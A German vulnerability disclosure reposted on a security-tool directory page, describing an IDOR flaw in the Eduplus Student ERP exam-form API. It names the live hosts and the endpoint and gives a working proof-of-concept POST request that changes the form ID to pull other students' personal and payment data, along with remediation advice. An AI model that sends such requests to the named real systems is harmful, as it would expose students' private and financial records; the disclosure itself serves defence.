Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-35678 — # Detaillierter Schwachstellenforschungsbericht über eine IDOR in Eduplus Student ERP, einschließlich technischer Analyse, PoC, Auswirkungsbewertung und Empfehlungen zur Behebung. | Kitploit
Tools/GitHubGitHub/sharma19d/cve-2026-35678
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

# Detaillierter Schwachstellenforschungsbericht über eine IDOR in Eduplus Student ERP, einschließlich technischer Analyse, PoC, Auswirkungsbewertung und Empfehlungen zur Behebung.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Schwachstellen-Forschungsbericht: Unsichere direkte Objektreferenz (IDOR) in allen Eduplus-Studenten-ERP-Systemen

Forscher: Vinay Sharma

1. Zusammenfassung

Dieser Bericht beschreibt eine Sicherheitslücke mit hohem Schweregrad, die in der Eduplus-Studenten-ERP-Plattform identifiziert wurde, insbesondere im Studenten-Lernportal (learnerapi.pceterp.in). Die Anwendung weist eine Universelle Unsichere direkte Objektreferenz (IDOR) am Endpunkt für die Prüfungsformular-Einreichung auf, die es jedem authentifizierten Benutzer (Studenten) ermöglicht, die sensiblen persönlichen und finanziellen Daten jedes anderen Studenten durch Manipulation von Formular-IDs abzurufen.

Die Schwachstellen ermöglichen eine groß angelegte Datenerfassung von Studentendatensätzen, einschließlich personenbezogener Daten (PII) und detaillierter Prüfpfade für Finanztransaktionen.


2. Details zur Schwachstelle

  • Ziel-Host: learnerapi.pceterp.in, learner.zealerp.in, usw.
learner.despu.edu.in
  • Betroffener Endpunkt: POST /ExamForm/viewSubmitExamForm
  • Arten von Schwachstellen:
    • Unsichere direkte Objektreferenz (IDOR) [CWE-639]
    • Schwache Kryptografie (AES-ECB mit fest codiertem Schlüssel) [CWE-327, CWE-798]
    • Offenlegung sensibler Daten [CWE-312]
  • Schweregrad: Hoch (Geschätzter CVSS v3.1: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. Technische Analyse

    3.1 Unsichere direkte Objektreferenz (IDOR)

    Die Schwachstelle befindet sich im Endpunkt viewSubmitExamForm. Der Server verlässt sich auf zwei vom Client bereitgestellte Parameter, um den abzurufenden Datensatz zu identifizieren:

    1. Anforderungstext: {"formid": "XXXXX"}
    2. HTTP-Header: Router-Path: /view-pcu-exam-form/XXXXX

    Während der Benutzer authentifiziert sein muss, prüft der Server nicht, ob der authentifizierte Student berechtigt ist, die mit der angeforderten formid verknüpften Daten einzusehen. Durch das Durchlaufen numerischer IDs kann ein Angreifer auf die Datensätze anderer Studenten zugreifen.

    4. Proof of Concept (PoC)

    4.1 IDOR-Ausnutzung

    Eine standardmäßige POST-Anfrage an den verwundbaren Endpunkt mit einer modifizierten formid liefert sensible Studentendaten.

    Anfrage:

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (Authentifizierte Header) ...
    
    {"formid":"28984"}
    

    Antwort (Zusammenfassung der geleakten Daten):

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Hochladen von Idorpoc.mp4…


    5. Auswirkungsanalyse

    Die erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht Folgendes:

    • Massenhafte Offenlegung von PII: Zugriff auf Namen, E-Mail-Adressen, Studenten-IDs und Anmelde-IP-Adressen der gesamten Studentenschaft.
    • Verletzung finanzieller Daten: Offenlegung von Transaktionsverläufen, Bank-IDs und Zahlungsgateway-Referenzen. Diese Informationen sind äußerst sensibel und könnten für finanzielles Social Engineering oder Betrug verwendet werden.
    • Verletzung der akademischen Privatsphäre: Unbefugter Zugriff auf Prüfungsformulare, Mentorenzuweisungen und Einreichungsstatus.

    6. Empfehlungen zur Behebung

    6.1 Autorisierungs-Fix (Priorität: Hoch)

    • Implementierung von serverseitigen Autorisierungsprüfungen: Das Backend muss verifizieren, dass die angeforderte formid zu der learnerid gehört, die mit der aktiven Sitzung verknüpft ist. Vertrauen Sie den Parametern formid oder Router-Path niemals ohne Validierung gegen das authentifizierte Sitzungstoken.

    6.3 Allgemeine Härtung

    • Minimierung der Datenausgabe: Stellen Sie sicher, dass die API nur die Felder zurückgibt, die für die jeweilige UI-Ansicht erforderlich sind. Interne Transaktions-IDs und IP-Adressen sollten geschwärzt werden, sofern sie nicht unbedingt für den Workflow des Benutzers erforderlich sind.
    • Sitzungssicherheit: Überprüfen Sie die Verwendung von benutzerdefinierten verschlüsselten Headern für das Sitzungsmanagement und erwägen Sie die Verwendung von standardmäßigen, gehärteten JWTs oder sicheren HTTP-only-Cookies.
    Tool herunterladen